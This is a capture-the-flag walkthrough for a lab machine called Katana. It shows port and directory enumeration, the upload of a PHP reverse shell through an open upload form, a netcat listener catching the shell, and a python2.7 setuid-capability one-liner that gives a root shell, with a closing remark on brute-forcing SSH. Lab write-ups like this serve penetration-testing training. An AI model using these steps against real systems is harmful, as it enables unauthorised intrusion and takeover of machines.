pg-katana-play

Exploitation Guide for Katana

Summary

This machine is exploited by a file upload vulnerability in a web application. It is escalated by exploiting a misconfigured Linux file capability in the python2.7 binary.

Enumeration

Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap -p- 192.168.120.154
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 11:33 EDT
Nmap scan report for 192.168.120.154
Host is up (0.030s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server
7080/tcp open  empowerid
8088/tcp open  radan-http
8715/tcp open  unknown
9198/tcp open  unknown

Dirb

Using dirb and the default wordlist, we are able to brute-force and discover upload.html on port 8088:

kali@kali:~$ dirb http://192.168.120.155:8088 -X .html -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 20 14:05:14 2020
URL_BASE: http://192.168.120.155:8088/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
EXTENSIONS_LIST: (.html) | (.html) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.120.155:8088/ ----
+ http://192.168.120.155:8088/error404.html (CODE:200|SIZE:195)                                                
+ http://192.168.120.155:8088/index.html (CODE:200|SIZE:655)                                                   
+ http://192.168.120.155:8088/upload.html (CODE:200|SIZE:6480)                                                 
                                                                                                               
-----------------
END_TIME: Thu Aug 20 14:07:40 2020
DOWNLOADED: 4612 - FOUND: 3

Exploitation

File Upload Vulnerability

Navigating to http://192.168.120.155:8088/upload.html, we see a couple of file upload controls. We are able to upload the PHP reverse shell available at /usr/share/webshells/php/php-reverse-shell.php:

kali@kali:~$ locate php-reverse-shell.php
...
/usr/share/webshells/php/php-reverse-shell.php
...
kali@kali:~$

Set the local port to 4444 in the PHP reverse shell. We can choose either control for our upload. After selecting the prepared PHP reverse shell, click Submit Query. The following message appears:

Please wait for 1 minute!. Please relax!.

File : file1
Name :
Type :
Path :
Size : 0
Please wait for 1 minute!. Please relax!.

file is empty, not stored.

File : file2
Name : php-reverse-shell.php
Type : application/x-php
Path : /tmp/phpFjoLWh
Size : 5495
Please wait for 1 minute!. Please relax!.

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php
MD5 : 8783aa0d056e9e74e9d9856605d072a5
Size : 5495 bytes

The important part is this:

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php

First, start a netcat listener on port 4444. From the nmap scan, we saw an open port 8715. Using some guess work and the above message, we can trigger the reverse shell by navigating to http://192.168.120.155:8715/katana_php-reverse-shell.php:

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.155: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.155] 57806
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 13:36:02 up 1 min,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@katana:/$

Escalation

Checking File Capabilities

Using getcap with the recursive flag from the root directory, we see file capability with +ep permission is set on python2.7:

www-data@katana:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
www-data@katana:~$

Linux file capabilities are maintained by the kernel. This concept is similar to how SUID functions. Linux’s thread privilege checking is based on capabilities. Capabilities work by breaking the actions normally reserved for root down into smaller portions. The file capability sets are stored in an extended attribute named security.capability.

We are able to abuse the capabilities misconfiguration of python2.7 to drop ourselves into a root shell:

www-data@katana:~$ whoami
whoami
www-data
www-data@katana:~$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
root@katana:~# whoami
whoami
root
root@katana:~# 

.

unatended way : bruteforce ssh, and find katana /root

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *